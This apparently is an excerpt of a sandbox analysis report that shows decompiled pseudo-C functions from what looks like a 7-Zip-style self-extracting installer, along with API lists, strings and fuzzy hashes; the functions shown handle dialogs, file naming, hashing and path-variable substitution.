					_push(_t74);
					_t71 = L".%03u";
					while(1) {
						wsprintfW(_t77 - 0x10, _t71);
						_t80 = _t80 + 0xc;
						_t69 = _t77 + 0x5c;
						E00411BE5(_t77 + 0x68,  *((intOrPtr*)(E00411B08(_t77 + 0x30, _t77 + 0x5c, _t77 - 0x10))));
						_push( *((intOrPtr*)(_t77 + 0x30)));
						L004191B0();
						_t44 = E00409A19(_t77 + 0x3c,  *((intOrPtr*)(_t77 + 0x68)), _t77 + 0x3c);
						__eflags = _t44;
						if(_t44 != 0) {
							break;
						}
						_t46 = E00409DD3(_t77 + 0x3c, _t52 + 0x1c, _t69, _t77 + 0x3c);
						_push( *((intOrPtr*)(_t77 + 0x68)));
						L004191B0();
						_t17 = _t77 + 0x74;
						 *_t17 =  *((intOrPtr*)(_t77 + 0x74)) + 1;
						__eflags =  *_t17;
						E00411B60(_t46, _t77 + 0x68);
						_push( *((intOrPtr*)(_t77 + 0x74)));
					}
					_push( *((intOrPtr*)(_t77 + 0x68)));
					L004191B0();
					_push( *((intOrPtr*)(_t77 + 0x5c)));
					L004191B0();
					_t48 =  *((intOrPtr*)(_t77 + 0x3c));
					__eflags = _t48;
					if(_t48 != 0) {
						 *((intOrPtr*)( *_t48 + 8))(_t48);
					}
					_t49 = 1;
				} else {
					_push( *((intOrPtr*)(_t77 + 0x5c)));
					L004191B0();
					_t49 = 0;
				}
				return _t49;
			}

0x00409dfd
0x00409dfe
0x00409e02
0x00409e0b
0x00409e11
0x00409e14
0x00409e17
0x00409e1a
0x00409e1d
0x00409e20
0x00409e23
0x00409e26
0x00409e33
0x00409e38
0x00409e4e
0x00409e51
0x00409e56
0x00409e5d
0x00409e87
0x00409e8c
0x00409e8e
0x00409e95
0x00409ea5
0x00409eaa
0x00409ead
0x00409ebc
0x00409ec1
0x00409ec3
0x00000000
0x00000000
0x00409e6b
0x00409e70
0x00409e73
0x00409e78
0x00409e78
0x00409e78
0x00409e7f
0x00409e84
0x00409e84
0x00409ec5
0x00409ec8
0x00409ecd
0x00409ed0
0x00409ed5
0x00409edb
0x00409edd
0x00409ee2
0x00409ee2
0x00409ee5
0x00409e3a
0x00409e3a
0x00409e3d
0x00409e43
0x00409e43
0x00409eed

APIs

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT ref: 00411B68

Part of subcall function 00409AB1: ??3@YAXPAX@Z.MSVCRT ref: 00409B36
Part of subcall function 00409AB1: _wtol.MSVCRT(?,?,00000002,-00000002,?,?,0041E844,00000000), ref: 00409B5F
Part of subcall function 00409AB1: ??3@YAXPAX@Z.MSVCRT ref: 00409BF0

??3@YAXPAX@Z.MSVCRT ref: 00409E3D
wsprintfW.USER32 ref: 00409E8C
??3@YAXPAX@Z.MSVCRT ref: 00409EAD
??3@YAXPAX@Z.MSVCRT ref: 00409EC8
??3@YAXPAX@Z.MSVCRT ref: 00409ED0

Strings

.%03u, xrefs: 00409E5D, 00409E8A

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$??2@_wtolwsprintf
String ID: .%03u
API String ID: 2619731350-3746577511
Opcode ID: c57c0ca734d4a9ba290237b44851dc12d51ea165ec7524e85ad6be04a4cecdb0
Instruction ID: 700b262c2caaefa25544a4da0f9a64c534e6180d5fa040a2be027d4297a76f61
Opcode Fuzzy Hash: c57c0ca734d4a9ba290237b44851dc12d51ea165ec7524e85ad6be04a4cecdb0
Instruction Fuzzy Hash: 0C311A71504209AFCF04EF65D8518EE3BB9EF04354B14402BFD15922A2EB39ED85CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00407AED, Relevance: 12.1, APIs: 8, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407AED(intOrPtr __ecx, WCHAR* _a4, void* _a8, void* _a12, signed int _a16) {
				struct HDC__* _v8;
				signed int _v12;
				intOrPtr _v16;
				struct HDC__* _t31;
				int _t33;
				int _t35;
				void* _t45;
				long _t47;
				long _t53;
				struct tagRECT* _t57;

				_v12 = _v12 & 0x00000000;
				_v16 = __ecx;
				_t31 = GetDC( *(__ecx + 4));
				_v8 = _t31;
				if(_t31 != 0) {
					_t33 = GetSystemMetrics(0xb);
					_t45 = 0xffffffc4;
					_t53 = _t45 - _t33 + GetSystemMetrics(0x3d);
					_t35 = GetSystemMetrics(0x3e);
					_t57 = _a8;
					_t10 = _t35 - 0x78; // -120
					_t47 = _t10;
					_t57->bottom = 0;
					_t57->top = 0;
					_t57->left = 0;
					_t57->right = _t53;
					_a8 = SelectObject(_v8, _a12);
					_v12 = 0 | DrawTextW(_v8, _a4, 0xffffffff, _t57, _a16 | 0x00000400) > 0x00000000;
					if(_t53 < _t57->right) {
						_t57->right = _t53;
					}
					if(_t47 < _t57->bottom) {
						_t57->bottom = _t47;
					}
					SelectObject(_v8, _a8);
					ReleaseDC( *(_v16 + 4), _v8);
				}
				return _v12;
			}

0x00407af6
0x00407afa
0x00407afd
0x00407b03
0x00407b08
0x00407b19
0x00407b1d
0x00407b26
0x00407b29
0x00407b2e
0x00407b34
0x00407b34
0x00407b39
0x00407b3c
0x00407b3f
0x00407b41
0x00407b4a
0x00407b6c
0x00407b72
0x00407b74
0x00407b74
0x00407b7a
0x00407b7c
0x00407b7c
0x00407b85
0x00407b94
0x00407b9c
0x00407ba1

APIs

GetDC.USER32(?), ref: 00407AFD
GetSystemMetrics.USER32 ref: 00407B19
GetSystemMetrics.USER32 ref: 00407B22
GetSystemMetrics.USER32 ref: 00407B29
SelectObject.GDI32(?,?), ref: 00407B44
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00407B5F
SelectObject.GDI32(?,?), ref: 00407B85
ReleaseDC.USER32 ref: 00407B94

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: MetricsSystem$ObjectSelect$DrawReleaseText
String ID:
API String ID: 2466489532-0
Opcode ID: 2de4bb473bfb4b8f909a57e36c0b108e7016f7be85cc3fde936b1bc80fa66e5b
Instruction ID: c6efab504cd997bbd87537fcada5a97682737a4c05f62cea40a671b0dd12ad2f
Opcode Fuzzy Hash: 2de4bb473bfb4b8f909a57e36c0b108e7016f7be85cc3fde936b1bc80fa66e5b
Instruction Fuzzy Hash: 53213871900209EFCB11DFA5DD44A9EBFF4EF08364F10C46AE829A62A0C731AA54DF51

Uniqueness

Uniqueness Score: -1.00%

Function 0040B900, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040B900(intOrPtr* __ecx) {
				void* _t48;
				void* _t58;
				signed int _t59;
				void* _t60;
				void* _t61;
				void* _t64;
				void* _t73;
				intOrPtr* _t90;
				intOrPtr* _t92;
				signed int _t95;
				void* _t97;
				void* _t98;

				_t92 = __ecx;
				if( *__ecx != 0x3f) {
					_t48 =  *((intOrPtr*)(__ecx + 4)) +  *((intOrPtr*)(__ecx + 0x1c)) + 8;
					_t64 = 0;
					 *(_t97 + 0x10) = _t48;
					if(_t48 != 0) {
						_push(_t48);
						L004191BC();
						_t97 = _t97 + 4;
						_t64 = _t48;
					}
					memcpy(_t64, _t92 + 8,  *(_t92 + 4));
					memcpy(_t64 +  *(_t92 + 4),  *(_t92 + 0x18),  *(_t92 + 0x1c));
					_t90 = _t64 +  *(_t92 + 4) +  *(_t92 + 0x1c);
					 *_t90 = 0;
					 *((intOrPtr*)(_t90 + 4)) = 0;
					_t98 = _t97 + 0x18;
					 *((intOrPtr*)(_t98 + 0x1c)) = 0x6a09e667;
					 *((intOrPtr*)(_t98 + 0x20)) = 0xbb67ae85;
					 *((intOrPtr*)(_t98 + 0x24)) = 0x3c6ef372;
					 *((intOrPtr*)(_t98 + 0x28)) = 0xa54ff53a;
					 *((intOrPtr*)(_t98 + 0x2c)) = 0x510e527f;
					 *((intOrPtr*)(_t98 + 0x30)) = 0x9b05688c;
					 *((intOrPtr*)(_t98 + 0x34)) = 0x1f83d9ab;
					 *((intOrPtr*)(_t98 + 0x38)) = 0x5be0cd19;
					 *((intOrPtr*)(_t98 + 0x3c)) = 0;
					 *((intOrPtr*)(_t98 + 0x40)) = 0;
					_t95 = E00419340(1,  *_t92, 0);
					 *(_t98 + 0x18) = 0;
					do {
						E0040B440(_t98 + 0x20, _t64,  *((intOrPtr*)(_t98 + 0x10)));
						_t58 = 0;
						while(1) {
							_t41 = _t58 + _t90;
							 *_t41 =  *((char*)(_t58 + _t90)) + 1;
							if( *_t41 != 0) {
								goto L14;
							}
							_t58 = _t58 + 1;
							if(_t58 < 8) {
								continue;
							}
							goto L14;
						}
						L14:
						_t59 =  *(_t98 + 0x18);
						_t95 = _t95 + 0xffffffff;
						asm("adc eax, 0xffffffff");
						 *(_t98 + 0x18) = _t59;
					} while ((_t95 | _t59) != 0);
					_t46 = _t98 + 0x1c; // 0x6a09e667
					_t60 = E0040B6F0(_t46, _t92 + 0x20);
					_push(_t64);
					L004191B0();
					return _t60;
				}
				_t61 = 0;
				if( *((intOrPtr*)(__ecx + 4)) > 0) {
					do {
						 *((char*)(__ecx + _t61 + 0x20)) =  *((intOrPtr*)(__ecx + _t61 + 8));
						_t61 = _t61 + 1;
					} while (_t61 <  *((intOrPtr*)(__ecx + 4)));
				}
				_t73 = 0;
				if( *(_t92 + 0x1c) <= 0) {
					L6:
					if(_t61 >= 0x20) {
						goto L16;
					} else {
						_t14 = _t92 + 0x20; // 0x21
						return memset(_t61 + _t14, 0, 0x20 - _t61);
					}
				} else {
					while(_t61 < 0x20) {
						 *((char*)(_t61 + _t92 + 0x20)) =  *((intOrPtr*)(_t73 +  *(_t92 + 0x18)));
						_t73 = _t73 + 1;
						_t61 = _t61 + 1;
						if(_t73 <  *(_t92 + 0x1c)) {
							continue;
						} else {
							goto L6;
						}
						goto L17;
					}
					L16:
					return _t61;
				}
				L17:
			}

0x0040b904
0x0040b909
0x0040b96e
0x0040b974
0x0040b977
0x0040b97d
0x0040b97f
0x0040b980
0x0040b985
0x0040b988
0x0040b988
0x0040b993
0x0040b9a6
0x0040b9b0
0x0040b9b5
0x0040b9b7
0x0040b9bc
0x0040b9c6
0x0040b9ce
0x0040b9d6
0x0040b9de
0x0040b9e6
0x0040b9ee
0x0040b9f6
0x0040b9fe
0x0040ba06
0x0040ba0a
0x0040ba13
0x0040ba15
0x0040ba20
0x0040ba2b
0x0040ba30
0x0040ba32
0x0040ba32
0x0040ba32
0x0040ba35
0x00000000
0x00000000
0x0040ba37
0x0040ba3b
0x00000000
0x00000000
0x00000000
0x0040ba3b
0x0040ba3d
0x0040ba3d
0x0040ba41
0x0040ba44
0x0040ba4b
0x0040ba4b
0x0040ba54
0x0040ba58
0x0040ba5d
0x0040ba5e
0x00000000
0x0040ba68
0x0040b90b
0x0040b910
0x0040b912
0x0040b916
0x0040b91a
0x0040b91b
0x0040b912
0x0040b920
0x0040b925
0x0040b941
0x0040b944
0x00000000
0x0040b94a
0x0040b952
0x0040b965
0x0040b965
0x0040b927
0x0040b927
0x0040b936
0x0040b93a
0x0040b93b
0x0040b93f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b93f
0x0040ba6d
0x0040ba6d
0x0040ba6d
0x00000000

APIs

memset.MSVCRT ref: 0040B959
??2@YAPAXI@Z.MSVCRT ref: 0040B980
memcpy.MSVCRT ref: 0040B993
memcpy.MSVCRT ref: 0040B9A6
??3@YAXPAX@Z.MSVCRT ref: 0040BA5E

Strings

gj, xrefs: 0040BA54

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: memcpy$??2@??3@memset
String ID: gj
API String ID: 1510051167-4203073231
Opcode ID: 60cc8d992ad2c5882553e5a6e6e1aee1394c149cba76ecc69202d6c10c5e319e
Instruction ID: d88508602b6957b794b8bf8d319cc32ba67a487d5ed6ee7fd98696191516abac
Opcode Fuzzy Hash: 60cc8d992ad2c5882553e5a6e6e1aee1394c149cba76ecc69202d6c10c5e319e
Instruction Fuzzy Hash: 34418CB1A043009FC320EF65C88096BB7E5FB99718F144E2EE4D697752E734E949CB89

Uniqueness

Uniqueness Score: -1.00%

Function 00401B0B, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00401B0B() {
				struct HWND__* _v8;
				short _v264;
				short _v2312;
				WCHAR* _t15;
				struct HWND__* _t32;
				intOrPtr* _t33;
				intOrPtr* _t34;
				WCHAR* _t35;
				WCHAR* _t36;
				WCHAR* _t37;
				void* _t39;
				intOrPtr* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t48;

				_t15 =  *0x41e714; // 0x0
				_t45 = _t44 - 0x904;
				_t32 = 0;
				_t43 = _t34;
				if(_t15 == 0) {
					_t35 = 0x27;
					wsprintfW( &_v2312, E00403DC8(_t35),  *_t43,  *((intOrPtr*)(_t43 + 0xc)));
					_t46 = _t45 + 0x10;
					_v8 = 0;
					if( *((intOrPtr*)(_t43 + 0x10)) <= 0) {
						L8:
						if(";!@Install@!UTF-8!" == 0x3b) {
							_t36 =  &_v2312;
							L11:
							E00409686(_t36, _t39);
							L12:
							E00405B62();
							ExitProcess(0xa);
						}
						_push(_t32);
						_t37 = 3;
						MessageBoxW(_t32,  &_v2312, E00403DC8(_t37), ??);
						goto L12;
					}
					_t33 = _t43 + 0x14;
					do {
						wsprintfW( &_v264, L"\t0x%p\n",  *_t33);
						_t46 = _t46 + 0xc;
						lstrcatW( &_v2312,  &_v264);
						_v8 = _v8 + 1;
						_t33 = _t33 + 4;
					} while (_v8 <  *((intOrPtr*)(_t43 + 0x10)));
					_t32 = 0;
					goto L8;
				}
				_t48 =  *0x41e716 - _t32; // 0x0
				if(_t48 != 0) {
					 *0x41e714 = _t15;
				}
				_t36 = E00403DC8(_t15);
				goto L11;
			}

0x00401b0e
0x00401b13
0x00401b1b
0x00401b1e
0x00401b22
0x00401b44
0x00401b5d
0x00401b5f
0x00401b62
0x00401b68
0x00401ba4
0x00401bab
0x00401bc7
0x00401bcd
0x00401bcd
0x00401bd2
0x00401bd2
0x00401bd9
0x00401bd9
0x00401bad
0x00401bb0
0x00401bbf
0x00000000
0x00401bbf
0x00401b6a
0x00401b6d
0x00401b7b
0x00401b7d
0x00401b8e
0x00401b94
0x00401b9a
0x00401b9d
0x00401ba2
0x00000000
0x00401ba2
0x00401b24
0x00401b2b
0x00401b2f
0x00401b2f
0x00401b3b
0x00000000

APIs

wsprintfW.USER32 ref: 00401B5D
wsprintfW.USER32 ref: 00401B7B
lstrcatW.KERNEL32(?,?), ref: 00401B8E
MessageBoxW.USER32(00000000,?,00000000,00000000), ref: 00401BBF
ExitProcess.KERNEL32 ref: 00401BD9

Strings

0x%p, xrefs: 00401B75

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: wsprintf$ExitMessageProcesslstrcat
String ID: 0x%p
API String ID: 1920160435-1745605757
Opcode ID: de6fc8d45903a09760ad9a5220580b1c83e0b5bb66eb900d9d32d6c52b165c1f
Instruction ID: 21ff27a6a0f5ea301036ba6721b670bc4eb5db3d4988dc935fe7745def954242
Opcode Fuzzy Hash: de6fc8d45903a09760ad9a5220580b1c83e0b5bb66eb900d9d32d6c52b165c1f
Instruction Fuzzy Hash: 7F219975901208AFD720DFB4DD85EDA77BCEF04304F0044BAE611A21D1EB78BE548B6A

Uniqueness

Uniqueness Score: -1.00%

Function 00407F86, Relevance: 10.6, APIs: 7, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E00407F86(long __ecx, struct HWND__* _a4) {
				struct HDC__* _v8;
				char _v324;
				short _v326;
				short _v328;
				void _v360;
				char _v432;
				short _v436;
				int _v452;
				void _v860;
				DLGTEMPLATE* _t22;
				struct HDC__* _t24;
				signed int _t26;
				long _t30;
				signed int _t32;
				CHAR* _t34;
				struct HINSTANCE__* _t41;

				_t30 = __ecx;
				_t32 = 0x58;
				memcpy( &_v360, 0x41e490, _t32 << 2);
				_v860 = 0x1f4;
				if(SystemParametersInfoW(0x29, 0,  &_v860, 0) != 0) {
					_t24 = GetDC(0);
					_v8 = _t24;
					_t26 = MulDiv(_v452, 0x48, GetDeviceCaps(_t24, 0x5a));
					ReleaseDC(0, _v8);
					_v326 = _v436;
					_v328 =  ~_t26;
					_v324 = _v432;
				}
				_t41 = GetModuleHandleW(0);
				if( *(_t30 + 0x38) == 0) {
					L4:
					_t22 =  &_v360;
					 *(_t30 + 0x38) = 0;
				} else {
					_push(0);
					_t34 = 5;
					_t22 = E004039F0(_t34,  *(_t30 + 0x38) & 0x0000ffff);
					if(_t22 == 0) {
						goto L4;
					}
				}
				return DialogBoxIndirectParamW(_t41, _t22, _a4, E00407744, _t30);
			}

0x00407f94
0x00407f96
0x00407fa2
0x00407fb1
0x00407fc3
0x00407fc6
0x00407fcf
0x00407fe1
0x00407fef
0x00407ffc
0x00408009
0x00408010
0x00408010
0x0040801d
0x00408022
0x00408035
0x00408035
0x0040803b
0x00408024
0x00408028
0x0040802b
0x0040802c
0x00408033
0x00000000
0x00000000
0x00408033
0x00408053

APIs

SystemParametersInfoW.USER32 ref: 00407FBB
GetDC.USER32(00000000), ref: 00407FC6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00407FD2
MulDiv.KERNEL32(?,00000048,00000000), ref: 00407FE1
ReleaseDC.USER32 ref: 00407FEF
GetModuleHandleW.KERNEL32(00000000), ref: 00408017
DialogBoxIndirectParamW.USER32 ref: 00408049

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystem
String ID:
API String ID: 3212456201-0
Opcode ID: d52d7d66d1777c6683a19ab09cc34ad267647d5eb631a79ac1977f9ea0d9fe45
Instruction ID: 0d6cfd111af944fba9a3d93ccc4bb6b201ee0ba3342a1467b8569908ac4f5c69
Opcode Fuzzy Hash: d52d7d66d1777c6683a19ab09cc34ad267647d5eb631a79ac1977f9ea0d9fe45
Instruction Fuzzy Hash: 8921C331901258AFDB319F61DC48FEB7BBCEB89751F0040AAF909B2291DB344E80CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00408B72, Relevance: 10.6, APIs: 7, Instructions: 63
timethreadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00408B72(void* __ecx) {
				int _t10;
				signed int _t18;
				void* _t21;
				void* _t25;
				void* _t27;
				intOrPtr _t30;
				signed int _t31;
				void* _t35;

				_t27 = __ecx;
				_t30 =  *0x41e8e0; // 0x0
				if(_t30 != 0) {
					_t10 = EndDialog( *(__ecx + 4), 0);
				}
				_t31 =  *0x41e8d4; // 0x0
				if(_t31 != 0) {
					KillTimer( *(_t27 + 4), 1);
					_t32 =  *0x41e44c & 0x00000100;
					if(( *0x41e44c & 0x00000100) == 0 || E00408B2E(_t27, _t25, _t32) != 0) {
						_push(0);
						_push( *(_t27 + 4));
						L13:
						return EndDialog();
					}
					_t18 =  *0x41e8d4; // 0x0
					_t10 = SetTimer( *(_t27 + 4), 1, _t18 * 0xa, 0);
				}
				_t35 =  *0x41e770 - 1; // 0x2
				if(_t35 != 0) {
					_t21 =  *0x41e720; // 0x33c
					if(_t21 != 0) {
						SuspendThread(_t21);
						_t37 =  *0x41e44c & 0x00000100;
						if(( *0x41e44c & 0x00000100) == 0 || E00408B2E(_t27, _t25, _t37) != 0) {
							 *0x41e8cc = 1;
							TerminateThread(_t21, 0x16);
							_push(0);
							_push( *(_t27 + 4));
							goto L13;
						} else {
							return ResumeThread(_t21);
						}
					}
				}
				return _t10;
			}

0x00408b7e
0x00408b80
0x00408b86
0x00408b8c
0x00408b8c
0x00408b91
0x00408b97
0x00408b9d
0x00408ba3
0x00408bad
0x00408c07
0x00408c08
0x00408c21
0x00000000
0x00408c21
0x00408bba
0x00408bc8
0x00408bc8
0x00408bce
0x00408bd4
0x00408bd6
0x00408bde
0x00408be1
0x00408be7
0x00408bf1
0x00408c10
0x00408c16
0x00408c1c
0x00408c1e
0x00000000
0x00408bfe
0x00000000
0x00408bff
0x00408bf1
0x00408bde
0x00408c27

APIs

EndDialog.USER32(?,00000000), ref: 00408B8C
KillTimer.USER32(?,00000001), ref: 00408B9D
SetTimer.USER32(?,00000001,00000000,00000000), ref: 00408BC8
SuspendThread.KERNEL32(0000033C), ref: 00408BE1
ResumeThread.KERNEL32(0000033C), ref: 00408BFF
EndDialog.USER32(?,00000000), ref: 00408C21

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: DialogThreadTimer$KillResumeSuspend
String ID:
API String ID: 4151135813-0
Opcode ID: b8d07711118b6918d21d1c8eaca0c7ddfc869e85b997711a11a4ac529ea7d2d4
Instruction ID: f920c74330c8bea86978497107333c2b8e7ef69701de9f597e4ce46cb6d114b0
Opcode Fuzzy Hash: b8d07711118b6918d21d1c8eaca0c7ddfc869e85b997711a11a4ac529ea7d2d4
Instruction Fuzzy Hash: 401186752012089FE7155F62EF84AA776BCF704745B04843EF586612B1CB79AC10DF2D

Uniqueness

Uniqueness Score: -1.00%

Function 0040360E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040360E(void* __ecx, void* __edx) {
				char _v16;
				char _v28;
				void* _t18;
				void* _t34;
				void* _t51;
				void* _t52;
				intOrPtr* _t53;

				_t51 = __ecx;
				_t52 = __edx;
				E00411B60(_t18,  &_v16);
				E00411C48( &_v16, __edx);
				E00411CA3( &_v16, "\\");
				E00411B84( &_v28, L"%%T\\");
				E00411F27(__ecx,  &_v28,  &_v16);
				_push(_v28);
				L004191B0();
				E00411C48( &_v16, _t52);
				E00411CA3( &_v16, "/");
				E00411B84( &_v28, L"%%T/");
				E00411F27(_t51,  &_v28,  &_v16);
				L004191B0();
				 *_t53 = 0x41abd4;
				E00411B84( &_v28, _v28);
				_t34 = E00411F27(_t51,  &_v28, _t52);
				_push(_v28);
				L004191B0();
				_push(_v16);
				L004191B0();
				return _t34;
			}

0x00403616
0x0040361b
0x0040361d
0x00403626
0x00403633
0x00403640
0x0040364f
0x00403654
0x00403657
0x00403661
0x0040366e
0x0040367b
0x0040368a
0x00403692
0x0040369a
0x004036a1
0x004036ad
0x004036b2
0x004036b5
0x004036ba
0x004036bd
0x004036c7

APIs

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT ref: 00411B68

Part of subcall function 00411C48: ??2@YAPAXI@Z.MSVCRT ref: 00411C70
Part of subcall function 00411C48: ??3@YAXPAX@Z.MSVCRT ref: 00411C79
Part of subcall function 00411C48: memcpy.MSVCRT ref: 00411C93

Part of subcall function 00411CA3: memcpy.MSVCRT ref: 00411CD0

Part of subcall function 00411B84: memcpy.MSVCRT ref: 00411BAA

??3@YAXPAX@Z.MSVCRT ref: 00403657
??3@YAXPAX@Z.MSVCRT ref: 00403692
??3@YAXPAX@Z.MSVCRT ref: 004036B5
??3@YAXPAX@Z.MSVCRT ref: 004036BD

Strings

%%T/, xrefs: 00403673
%%T\, xrefs: 00403638

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$memcpy$??2@
String ID: %%T/$%%T\
API String ID: 3447362686-2679640699
Opcode ID: 1a28dbdc804128d08e23d839a08088058b61c284ccf021372bfe14cbd6a7e681
Instruction ID: 051198a5a84e8eab651e9532c73f3d1e84a216c654f8844b6e35c77aa68833ba
Opcode Fuzzy Hash: 1a28dbdc804128d08e23d839a08088058b61c284ccf021372bfe14cbd6a7e681
Instruction Fuzzy Hash: 17112B319481096ACB05F792EC53DFEB77A9E54318F10016FF712A20A1EF686AC6C699

Uniqueness

Uniqueness Score: -1.00%

Function 004036C8, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E004036C8(void* __ecx, void* __edx) {
				char _v16;
				char _v28;
				void* _t18;
				void* _t34;
				void* _t51;
				void* _t52;
				intOrPtr* _t53;

				_t51 = __ecx;
				_t52 = __edx;
				E00411B60(_t18,  &_v16);
				E00411C48( &_v16, __edx);
				E00411CA3( &_v16, "\\");
				E00411B84( &_v28, L"%%S\\");
				E00411F27(__ecx,  &_v28,  &_v16);
				_push(_v28);
				L004191B0();
				E00411C48( &_v16, _t52);
				E00411CA3( &_v16, "/");
				E00411B84( &_v28, L"%%S/");
				E00411F27(_t51,  &_v28,  &_v16);
				L004191B0();
				 *_t53 = L"%%S";
				E00411B84( &_v28, _v28);
				_t34 = E00411F27(_t51,  &_v28, _t52);
				_push(_v28);
				L004191B0();
				_push(_v16);
				L004191B0();
				return _t34;
			}

0x004036d0
0x004036d5
0x004036d7
0x004036e0
0x004036ed
0x004036fa
0x00403709
0x0040370e
0x00403711
0x0040371b
0x00403728
0x00403735
0x00403744
0x0040374c
0x00403754
0x0040375b
0x00403767
0x0040376c
0x0040376f
0x00403774
0x00403777
0x00403781

APIs

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT ref: 00411B68

Part of subcall function 00411C48: ??2@YAPAXI@Z.MSVCRT ref: 00411C70
Part of subcall function 00411C48: ??3@YAXPAX@Z.MSVCRT ref: 00411C79
Part of subcall function 00411C48: memcpy.MSVCRT ref: 00411C93

Part of subcall function 00411CA3: memcpy.MSVCRT ref: 00411CD0

Part of subcall function 00411B84: memcpy.MSVCRT ref: 00411BAA

??3@YAXPAX@Z.MSVCRT ref: 00403711
??3@YAXPAX@Z.MSVCRT ref: 0040374C
??3@YAXPAX@Z.MSVCRT ref: 0040376F
??3@YAXPAX@Z.MSVCRT ref: 00403777

Strings

%%S/, xrefs: 0040372D
%%S\, xrefs: 004036F2

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$memcpy$??2@
String ID: %%S/$%%S\
API String ID: 3447362686-358529586
